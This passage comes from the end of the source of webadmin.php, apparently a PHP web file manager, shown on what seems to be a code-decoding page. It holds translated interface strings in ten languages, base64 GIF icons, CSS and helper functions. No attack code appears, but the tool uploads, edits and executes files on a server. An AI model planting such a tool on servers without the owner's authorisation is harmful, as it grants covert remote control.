'Benutzername', 'password' => 'Kennwort', 'add' => 'hinzufgen', 'add_basic_auth' => 'HTTP-Basic-Auth hinzufgen', 'uploaded' => '"[%1]" wurde hochgeladen.', 'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', 'already_exists' => '"[%1]" existiert bereits.', 'created' => '"[%1]" wurde erstellt.', 'not_created' => '"[%1]" konnte nicht erstellt werden.', 'really_delete' => 'Sollen folgende Dateien wirklich gelscht werden?', 'deleted' => "Folgende Dateien wurden gelscht:
[%1]", 'not_deleted' => "Folgende Dateien konnten nicht gelscht werden:
[%1]", 'rename_file' => 'Benenne Datei um:', 'renamed' => '"[%1]" wurde in "[%2]" umbenannt.', 'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', 'move_files' => 'Verschieben folgende Dateien:', 'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:
[%1]", 'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:
[%1]", 'copy_files' => 'Kopiere folgende Dateien:', 'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:
[%1]", 'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:
[%1]", 'not_edited' => '"[%1]" kann nicht editiert werden.', 'executed' => "\"[%1]\" wurde erfolgreich ausgefhrt:
{%2}", 'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgefhrt werden:
{%2}", 'saved' => '"[%1]" wurde gespeichert.', 'not_saved' => '"[%1]" konnte nicht gespeichert werden.', 'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', 'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', 'permission_for' => 'Rechte fr "[%1]":', 'permission_set' => 'Die Rechte fr "[%1]" wurden auf [%2] gesetzt.', 'permission_not_set' => 'Die Rechte fr "[%1]" konnten nicht auf [%2] gesetzt werden.', 'not_readable' => '"[%1]" kann nicht gelesen werden.' ); case 'fr': $date_format = 'd.m.y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Rpertoire', 'file' => 'Fichier', 'filename' => 'Nom fichier', 'size' => 'Taille', 'permission' => 'Droits', 'owner' => 'Propritaire', 'group' => 'Groupe', 'other' => 'Autres', 'functions' => 'Fonctions', 'read' => 'Lire', 'write' => 'Ecrire', 'execute' => 'Excuter', 'create_symlink' => 'Crer lien symbolique', 'delete' => 'Effacer', 'rename' => 'Renommer', 'move' => 'Dplacer', 'copy' => 'Copier', 'edit' => 'Ouvrir', 'download' => 'Tlcharger sur PC', 'upload' => 'Tlcharger sur serveur', 'create' => 'Crer', 'change' => 'Changer', 'save' => 'Sauvegarder', 'set' => 'Excuter', 'reset' => 'Rinitialiser', 'relative' => 'Relatif', 'yes' => 'Oui', 'no' => 'Non', 'back' => 'Retour', 'destination' => 'Destination', 'symlink' => 'Lien symbollique', 'no_output' => 'Pas de sortie', 'user' => 'Utilisateur', 'password' => 'Mot de passe', 'add' => 'Ajouter', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" a t tlcharg sur le serveur.', 'not_uploaded' => '"[%1]" n a pas t tlcharg sur le serveur.', 'already_exists' => '"[%1]" existe dj.', 'created' => '"[%1]" a t cr.', 'not_created' => '"[%1]" n a pas pu tre cr.', 'really_delete' => 'Effacer le fichier?', 'deleted' => "Ces fichiers ont t dtuits:
[%1]", 'not_deleted' => "Ces fichiers n ont pu tre dtruits:
[%1]", 'rename_file' => 'Renomme fichier:', 'renamed' => '"[%1]" a t renomm en "[%2]".', 'not_renamed' => '"[%1] n a pas pu tre renomm en "[%2]".', 'move_files' => 'Dplacer ces fichiers:', 'moved' => "Ces fichiers ont t dplacs en \"[%2]\":
[%1]", 'not_moved' => "Ces fichiers n ont pas pu tre dplacs en \"[%2]\":
[%1]", 'copy_files' => 'Copier ces fichiers:', 'copied' => "Ces fichiers ont t copis en \"[%2]\":
[%1]", 'not_copied' => "Ces fichiers n ont pas pu tre copis en \"[%2]\":
[%1]", 'not_edited' => '"[%1]" ne peut tre ouvert.', 'executed' => "\"[%1]\" a t brillamment excut :
{%2}", 'not_executed' => "\"[%1]\" n a pas pu tre excut:
{%2}", 'saved' => '"[%1]" a t sauvegard.', 'not_saved' => '"[%1]" n a pas pu tre sauvegard.', 'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a t cre.', 'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu tre cr.', 'permission_for' => 'Droits de "[%1]":', 'permission_set' => 'Droits de "[%1]" ont t changs en [%2].', 'permission_not_set' => 'Droits de "[%1]" n ont pas pu tre changs en[%2].', 'not_readable' => '"[%1]" ne peut pas tre ouvert.' ); case 'it': $date_format = 'd-m-Y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'File', 'filename' => 'Nome File', 'size' => 'Dimensioni', 'permission' => 'Permessi', 'owner' => 'Proprietario', 'group' => 'Gruppo', 'other' => 'Altro', 'functions' => 'Funzioni', 'read' => 'leggi', 'write' => 'scrivi', 'execute' => 'esegui', 'create_symlink' => 'crea link simbolico', 'delete' => 'cancella', 'rename' => 'rinomina', 'move' => 'sposta', 'copy' => 'copia', 'edit' => 'modifica', 'download' => 'download', 'upload' => 'upload', 'create' => 'crea', 'change' => 'cambia', 'save' => 'salva', 'set' => 'imposta', 'reset' => 'reimposta', 'relative' => 'Percorso relativo per la destinazione', 'yes' => 'Si', 'no' => 'No', 'back' => 'indietro', 'destination' => 'Destinazione', 'symlink' => 'Link simbolico', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'aggiungi', 'add_basic_auth' => 'aggiungi autenticazione base', 'uploaded' => '"[%1]"  stato caricato.', 'not_uploaded' => '"[%1]" non  stato caricato.', 'already_exists' => '"[%1]" esiste gi.', 'created' => '"[%1]"  stato creato.', 'not_created' => '"[%1]" non  stato creato.', 'really_delete' => 'Cancello questi file ?', 'deleted' => "Questi file sono stati cancellati:
[%1]", 'not_deleted' => "Questi file non possono essere cancellati:
[%1]", 'rename_file' => 'File rinominato:', 'renamed' => '"[%1]"  stato rinominato in "[%2]".', 'not_renamed' => '"[%1] non  stato rinominato in "[%2]".', 'move_files' => 'Sposto questi file:', 'moved' => "Questi file sono stati spostati in \"[%2]\":
[%1]", 'not_moved' => "Questi file non possono essere spostati in \"[%2]\":
[%1]", 'copy_files' => 'Copio questi file', 'copied' => "Questi file sono stati copiati in \"[%2]\":
[%1]", 'not_copied' => "Questi file non possono essere copiati in \"[%2]\":
[%1]", 'not_edited' => '"[%1]" non pu essere modificato.', 'executed' => "\"[%1]\"  stato eseguito con successo:
{%2}", 'not_executed' => "\"[%1]\" non  stato eseguito con successo
{%2}", 'saved' => '"[%1]"  stato salvato.', 'not_saved' => '"[%1]" non  stato salvato.', 'symlinked' => 'Il link siambolico da "[%2]" a "[%1]"  stato creato.', 'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non  stato creato.', 'permission_for' => 'Permessi di "[%1]":', 'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', 'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', 'not_readable' => '"[%1]" non pu essere letto.' ); case 'nl': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'Bestand', 'filename' => 'Bestandsnaam', 'size' => 'Grootte', 'permission' => 'Bevoegdheid', 'owner' => 'Eigenaar', 'group' => 'Groep', 'other' => 'Anderen', 'functions' => 'Functies', 'read' => 'lezen', 'write' => 'schrijven', 'execute' => 'uitvoeren', 'create_symlink' => 'maak symlink', 'delete' => 'verwijderen', 'rename' => 'hernoemen', 'move' => 'verplaatsen', 'copy' => 'kopieren', 'edit' => 'bewerken', 'download' => 'downloaden', 'upload' => 'uploaden', 'create' => 'aanmaken', 'change' => 'veranderen', 'save' => 'opslaan', 'set' => 'instellen', 'reset' => 'resetten', 'relative' => 'Relatief pat naar doel', 'yes' => 'Ja', 'no' => 'Nee', 'back' => 'terug', 'destination' => 'Bestemming', 'symlink' => 'Symlink', 'no_output' => 'geen output', 'user' => 'Gebruiker', 'password' => 'Wachtwoord', 'add' => 'toevoegen', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" is verstuurd.', 'not_uploaded' => '"[%1]" kan niet worden verstuurd.', 'already_exists' => '"[%1]" bestaat al.', 'created' => '"[%1]" is aangemaakt.', 'not_created' => '"[%1]" kan niet worden aangemaakt.', 'really_delete' => 'Deze bestanden verwijderen?', 'deleted' => "Deze bestanden zijn verwijderd:
[%1]", 'not_deleted' => "Deze bestanden konden niet worden verwijderd:
[%1]", 'rename_file' => 'Bestandsnaam veranderen:', 'renamed' => '"[%1]" heet nu "[%2]".', 'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".', 'move_files' => 'Verplaats deze bestanden:', 'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":
[%1]", 'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":
[%1]", 'copy_files' => 'Kopieer deze bestanden:', 'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":
[%1]", 'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":
[%1]", 'not_edited' => '"[%1]" kan niet worden bewerkt.', 'executed' => "\"[%1]\" is met succes uitgevoerd:
{%2}", 'not_executed' => "\"[%1]\" is niet goed uitgevoerd:
{%2}", 'saved' => '"[%1]" is opgeslagen.', 'not_saved' => '"[%1]" is niet opgeslagen.', 'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.', 'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.', 'permission_for' => 'Bevoegdheid voor "[%1]":', 'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].', 'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].', 'not_readable' => '"[%1]" kan niet worden gelezen.' ); case 'se': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Mapp', 'file' => 'Fil', 'filename' => 'Filnamn', 'size' => 'Storlek', 'permission' => 'Skerhetsniv', 'owner' => 'gare', 'group' => 'Grupp', 'other' => 'Andra', 'functions' => 'Funktioner', 'read' => 'Ls', 'write' => 'Skriv', 'execute' => 'Utfr', 'create_symlink' => 'Skapa symlink', 'delete' => 'Radera', 'rename' => 'Byt namn', 'move' => 'Flytta', 'copy' => 'Kopiera', 'edit' => 'ndra', 'download' => 'Ladda ner', 'upload' => 'Ladda upp', 'create' => 'Skapa', 'change' => 'ndra', 'save' => 'Spara', 'set' => 'Markera', 'reset' => 'Tm', 'relative' => 'Relative path to target', 'yes' => 'Ja', 'no' => 'Nej', 'back' => 'Tillbaks', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'Anvndare', 'password' => 'Lsenord', 'add' => 'Lgg till', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" har laddats upp.', 'not_uploaded' => '"[%1]" kunde inte laddas upp.', 'already_exists' => '"[%1]" finns redan.', 'created' => '"[%1]" har skapats.', 'not_created' => '"[%1]" kunde inte skapas.', 'really_delete' => 'Radera dessa filer?', 'deleted' => "De hr filerna har raderats:
[%1]", 'not_deleted' => "Dessa filer kunde inte raderas:
[%1]", 'rename_file' => 'Byt namn p fil:', 'renamed' => '"[%1]" har bytt namn till "[%2]".', 'not_renamed' => '"[%1] kunde inte dpas om till "[%2]".', 'move_files' => 'Flytta dessa filer:', 'moved' => "Dessa filer har flyttats till \"[%2]\":
[%1]", 'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":
[%1]", 'copy_files' => 'Kopiera dessa filer:', 'copied' => "Dessa filer har kopierats till \"[%2]\":
[%1]", 'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":
[%1]", 'not_edited' => '"[%1]" kan inte ndras.', 'executed' => "\"[%1]\" har utfrts:
{%2}", 'not_executed' => "\"[%1]\" kunde inte utfras:
{%2}", 'saved' => '"[%1]" har sparats.', 'not_saved' => '"[%1]" kunde inte sparas.', 'symlinked' => 'Symlink frn "[%2]" till "[%1]" har skapats.', 'not_symlinked' => 'Symlink frn "[%2]" till "[%1]" kunde inte skapas.', 'permission_for' => 'Rttigheter fr "[%1]":', 'permission_set' => 'Rttigheter fr "[%1]" ndrades till [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" kan inte lsas.' ); case 'sp': $date_format = 'j/n/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directorio', 'file' => 'Archivo', 'filename' => 'Nombre Archivo', 'size' => 'Tamao', 'permission' => 'Permisos', 'owner' => 'Propietario', 'group' => 'Grupo', 'other' => 'Otros', 'functions' => 'Funciones', 'read' => 'lectura', 'write' => 'escritura', 'execute' => 'ejecucin', 'create_symlink' => 'crear enlace', 'delete' => 'borrar', 'rename' => 'renombrar', 'move' => 'mover', 'copy' => 'copiar', 'edit' => 'editar', 'download' => 'bajar', 'upload' => 'subir', 'create' => 'crear', 'change' => 'cambiar', 'save' => 'salvar', 'set' => 'setear', 'reset' => 'resetear', 'relative' => 'Path relativo', 'yes' => 'Si', 'no' => 'No', 'back' => 'atrs', 'destination' => 'Destino', 'symlink' => 'Enlace', 'no_output' => 'sin salida', 'user' => 'Usuario', 'password' => 'Clave', 'add' => 'agregar', 'add_basic_auth' => 'agregar autentificacin bsica', 'uploaded' => '"[%1]" ha sido subido.', 'not_uploaded' => '"[%1]" no pudo ser subido.', 'already_exists' => '"[%1]" ya existe.', 'created' => '"[%1]" ha sido creado.', 'not_created' => '"[%1]" no pudo ser creado.', 'really_delete' => 'Borra estos archivos?', 'deleted' => "Estos archivos han sido borrados:
[%1]", 'not_deleted' => "Estos archivos no pudieron ser borrados:
[%1]", 'rename_file' => 'Renombra archivo:', 'renamed' => '"[%1]" ha sido renombrado a "[%2]".', 'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".', 'move_files' => 'Mover estos archivos:', 'moved' => "Estos archivos han sido movidos a \"[%2]\":
[%1]", 'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":
[%1]", 'copy_files' => 'Copiar estos archivos:', 'copied' => "Estos archivos han sido copiados a  \"[%2]\":
[%1]", 'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":
[%1]", 'not_edited' => '"[%1]" no pudo ser editado.', 'executed' => "\"[%1]\" ha sido ejecutado correctamente:
{%2}", 'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:
{%2}", 'saved' => '"[%1]" ha sido salvado.', 'not_saved' => '"[%1]" no pudo ser salvado.', 'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.', 'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.', 'permission_for' => 'Permisos de "[%1]":', 'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].', 'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].', 'not_readable' => '"[%1]" no pudo ser ledo.' ); case 'dk': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Mappe', 'file' => 'Fil', 'filename' => 'Filnavn', 'size' => 'Strrelse', 'permission' => 'Rettighed', 'owner' => 'Ejer', 'group' => 'Gruppe', 'other' => 'Andre', 'functions' => 'Funktioner', 'read' => 'ls', 'write' => 'skriv', 'execute' => 'kr', 'create_symlink' => 'opret symbolsk link', 'delete' => 'slet', 'rename' => 'omdb', 'move' => 'flyt', 'copy' => 'kopier', 'edit' => 'rediger', 'download' => 'download', 'upload' => 'upload', 'create' => 'opret', 'change' => 'skift', 'save' => 'gem', 'set' => 'st', 'reset' => 'nulstil', 'relative' => 'Relativ sti til valg', 'yes' => 'Ja', 'no' => 'Nej', 'back' => 'tilbage', 'destination' => 'Distination', 'symlink' => 'Symbolsk link', 'no_output' => 'ingen resultat', 'user' => 'Bruger', 'password' => 'Kodeord', 'add' => 'tilfj', 'add_basic_auth' => 'tilfj grundliggende rettigheder', 'uploaded' => '"[%1]" er blevet uploaded.', 'not_uploaded' => '"[%1]" kunnu ikke uploades.', 'already_exists' => '"[%1]" findes allerede.', 'created' => '"[%1]" er blevet oprettet.', 'not_created' => '"[%1]" kunne ikke oprettes.', 'really_delete' => 'Slet disse filer?', 'deleted' => "Disse filer er blevet slettet:
[%1]", 'not_deleted' => "Disse filer kunne ikke slettes:
[%1]", 'rename_file' => 'Omdd fil:', 'renamed' => '"[%1]" er blevet omdbt til "[%2]".', 'not_renamed' => '"[%1] kunne ikke omdbes til "[%2]".', 'move_files' => 'Flyt disse filer:', 'moved' => "Disse filer er blevet flyttet til \"[%2]\":
[%1]", 'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":
[%1]", 'copy_files' => 'Kopier disse filer:', 'copied' => "Disse filer er kopieret til \"[%2]\":
[%1]", 'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":
[%1]", 'not_edited' => '"[%1]" kan ikke redigeres.', 'executed' => "\"[%1]\" er blevet krt korrekt:
{%2}", 'not_executed' => "\"[%1]\" kan ikke kres korrekt:
{%2}", 'saved' => '"[%1]" er blevet gemt.', 'not_saved' => '"[%1]" kunne ikke gemmes.', 'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.', 'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.', 'permission_for' => 'Rettigheder for "[%1]":', 'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].', 'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sttes til [%2].', 'not_readable' => '"[%1]" Kan ikke lses.' ); case 'tr': $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Klasr', 'file' => 'Dosya', 'filename' => 'dosya adi', 'size' => 'boyutu', 'permission' => 'Izin', 'owner' => 'sahib', 'group' => 'Grup', 'other' => 'Digerleri', 'functions' => 'Fonksiyonlar', 'read' => 'oku', 'write' => 'yaz', 'execute' => 'alistir', 'create_symlink' => 'yarat symlink', 'delete' => 'sil', 'rename' => 'ad degistir', 'move' => 'tasi', 'copy' => 'kopyala', 'edit' => 'dzenle', 'download' => 'indir', 'upload' => 'ykle', 'create' => 'create', 'change' => 'degistir', 'save' => 'kaydet', 'set' => 'ayar', 'reset' => 'sifirla', 'relative' => 'Hedef yola gre', 'yes' => 'Evet', 'no' => 'Hayir', 'back' => 'Geri', 'destination' => 'Hedef', 'symlink' => 'Ksa yol', 'no_output' => 'ikti yok', 'user' => 'Kullanici', 'password' => 'Sifre', 'add' => 'ekle', 'add_basic_auth' => 'ekle basit-authentification', 'uploaded' => '"[%1]" yklendi.', 'not_uploaded' => '"[%1]" yklenemedi.', 'already_exists' => '"[%1]" kullanilmakta.', 'created' => '"[%1]" olusturuldu.', 'not_created' => '"[%1]" olusturulamadi.', 'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?', 'deleted' => "Bu dosyalar silindi:
[%1]", 'not_deleted' => "Bu dosyalar silinemedi:
[%1]", 'rename_file' => 'Adi degisen dosya:', 'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".', 'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.', 'move_files' => 'Tasinan dosyalar:', 'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":
[%1]", 'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":
[%1]", 'copy_files' => 'Kopyalanan dosyalar:', 'copied' => "Bu dosyalar kopyalandi \"[%2]\":
[%1]", 'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":
[%1]", 'not_edited' => '"[%1]" dzenlenemiyor.', 'executed' => "\"[%1]\" basariyla alistirildi:
{%2}", 'not_executed' => "\"[%1]\" alistirilamadi:
{%2}", 'saved' => '"[%1]" kaydedildi.', 'not_saved' => '"[%1]" kaydedilemedi.', 'symlinked' => '"[%2]" den "[%1]" e ksayol oluturuldu.', 'not_symlinked' => '"[%2]"den "[%1]" e ksayol oluturulamad.', 'permission_for' => 'Izinler "[%1]":', 'permission_set' => 'Izinler "[%1]" degistirildi [%2].', 'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].', 'not_readable' => '"[%1]" okunamiyor.' ); case 'cs': $date_format = 'd.m.y H:i:s'; $word_charset = 'UTF-8'; return array( 'directory' => 'Adres', 'file' => 'Soubor', 'filename' => 'Jmno souboru', 'size' => 'Velikost', 'permission' => 'Prva', 'owner' => 'Vlastnk', 'group' => 'Skupina', 'other' => 'Ostatn', 'functions' => 'Funkce', 'read' => 'ten', 'write' => 'Zpis', 'execute' => 'Spoutn', 'create_symlink' => 'Vytvoit symbolick odkaz', 'delete' => 'Smazat', 'rename' => 'Pejmenovat', 'move' => 'Pesunout', 'copy' => 'Zkoprovat', 'edit' => 'Otevt', 'download' => 'Sthnout', 'upload' => 'Nahraj na server', 'create' => 'Vytvoit', 'change' => 'Zmnit', 'save' => 'Uloit', 'set' => 'Nastavit', 'reset' => 'zpt', 'relative' => 'Relatif', 'yes' => 'Ano', 'no' => 'Ne', 'back' => 'Zpt', 'destination' => 'Destination', 'symlink' => 'Symbolick odkaz', 'no_output' => 'Przdn vstup', 'user' => 'Uivatel', 'password' => 'Heslo', 'add' => 'Pidat', 'add_basic_auth' => 'pidej zkladn autentizaci', 'uploaded' => 'Soubor "[%1]" byl nahrn na server.', 'not_uploaded' => 'Soubor "[%1]" nebyl nahrn na server.', 'already_exists' => 'Soubor "[%1]" u exituje.', 'created' => 'Soubor "[%1]" byl vytvoen.', 'not_created' => 'Soubor "[%1]" nemohl bt  vytvoen.', 'really_delete' => 'Vymazat soubor?', 'deleted' => "Byly vymazny tyto soubory:
[%1]", 'not_deleted' => "Tyto soubory nemohly bt vytvoeny:
[%1]", 'rename_file' => 'Pejmenuj soubory:', 'renamed' => 'Soubor "[%1]" byl pejmenovn na "[%2]".', 'not_renamed' => 'Soubor "[%1]" nemohl bt pejmenovn na "[%2]".', 'move_files' => 'Pemstit tyto soubory:', 'moved' => "Tyto soubory byly pemstny do \"[%2]\":
[%1]", 'not_moved' => "Tyto soubory nemohly bt pemstny do \"[%2]\":
[%1]", 'copy_files' => 'Zkoprovat tyto soubory:', 'copied' => "Tyto soubory byly zkoprovny do \"[%2]\":
[%1]", 'not_copied' => "Tyto soubory nemohly bt zkoprovny do \"[%2]\":
[%1]", 'not_edited' => 'Soubor "[%1]" nemohl bt oteven.', 'executed' => "SOubor \"[%1]\" byl sputn :
{%2}", 'not_executed' => "Soubor \"[%1]\" nemohl bt sputn:
{%2}", 'saved' => 'Soubor "[%1]" byl uloen.', 'not_saved' => 'Soubor "[%1]" nemohl bt uloen.', 'symlinked' => 'Byl vyvoen symbolick odkaz "[%2]" na soubor "[%1]".', 'not_symlinked' => 'Symbolick odkaz "[%2]" na soubor "[%1]" nemohl bt vytvoen.', 'permission_for' => 'Prva k "[%1]":', 'permission_set' => 'Prva k "[%1]" byla zmnna na [%2].', 'permission_not_set' => 'Prva k "[%1]" nemohla bt zmnna na [%2].', 'not_readable' => 'Soubor "[%1]" nen mono pest.' ); case 'en': default: $date_format = 'n/j/y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Directory', 'file' => 'File', 'filename' => 'Filename', 'size' => 'Size', 'permission' => 'Permission', 'owner' => 'Owner', 'group' => 'Group', 'other' => 'Others', 'functions' => 'Functions', 'read' => 'read', 'write' => 'write', 'execute' => 'execute', 'create_symlink' => 'create symlink', 'delete' => 'delete', 'rename' => 'rename', 'move' => 'move', 'copy' => 'copy', 'edit' => 'edit', 'download' => 'download', 'upload' => 'upload', 'create' => 'create', 'change' => 'change', 'save' => 'save', 'set' => 'set', 'reset' => 'reset', 'relative' => 'Relative path to target', 'yes' => 'Yes', 'no' => 'No', 'back' => 'back', 'destination' => 'Destination', 'symlink' => 'Symlink', 'no_output' => 'no output', 'user' => 'User', 'password' => 'Password', 'add' => 'add', 'add_basic_auth' => 'add basic-authentification', 'uploaded' => '"[%1]" has been uploaded.', 'not_uploaded' => '"[%1]" could not be uploaded.', 'already_exists' => '"[%1]" already exists.', 'created' => '"[%1]" has been created.', 'not_created' => '"[%1]" could not be created.', 'really_delete' => 'Delete these files?', 'deleted' => "These files have been deleted:
[%1]", 'not_deleted' => "These files could not be deleted:
[%1]", 'rename_file' => 'Rename file:', 'renamed' => '"[%1]" has been renamed to "[%2]".', 'not_renamed' => '"[%1] could not be renamed to "[%2]".', 'move_files' => 'Move these files:', 'moved' => "These files have been moved to \"[%2]\":
[%1]", 'not_moved' => "These files could not be moved to \"[%2]\":
[%1]", 'copy_files' => 'Copy these files:', 'copied' => "These files have been copied to \"[%2]\":
[%1]", 'not_copied' => "These files could not be copied to \"[%2]\":
[%1]", 'not_edited' => '"[%1]" can not be edited.', 'executed' => "\"[%1]\" has been executed successfully:
{%2}", 'not_executed' => "\"[%1]\" could not be executed successfully:
{%2}", 'saved' => '"[%1]" has been saved.', 'not_saved' => '"[%1]" could not be saved.', 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.', 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.', 'permission_for' => 'Permission of "[%1]":', 'permission_set' => 'Permission of "[%1]" was set to [%2].', 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', 'not_readable' => '"[%1]" can not be read.' ); } } function getimage ($image) { switch ($image) { case 'file': return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); case 'folder': return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'); case 'hidden_file': return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); case 'link': return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA'); case 'smiley': return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA='); case 'arrow': return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw=='); } } function html_header () { global $site_charset; echo <<<END
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />

<title>webadmin.php</title>

<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing .permission_header { text-align: left }
.listing .permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>

<script type="text/javascript">
<!--
function activate (name) {
	if (document && document.forms[0] && document.forms[0].elements['focus']) {
		document.forms[0].elements['focus'].value = name;
	}
}
//-->
</script>

</head>
<body>


END;
} function html_footer () { echo <<<END
</body>
</html>
END;
} function notice ($phrase) { global $cols; $args = func_get_args(); array_shift($args); return '<tr id="notice">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
'; } function error ($phrase) { global $cols; $args = func_get_args(); array_shift($args); return '<tr id="error">
	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
</tr>
'; } ?>

Did this file decode correctly?

Original Code

<?php
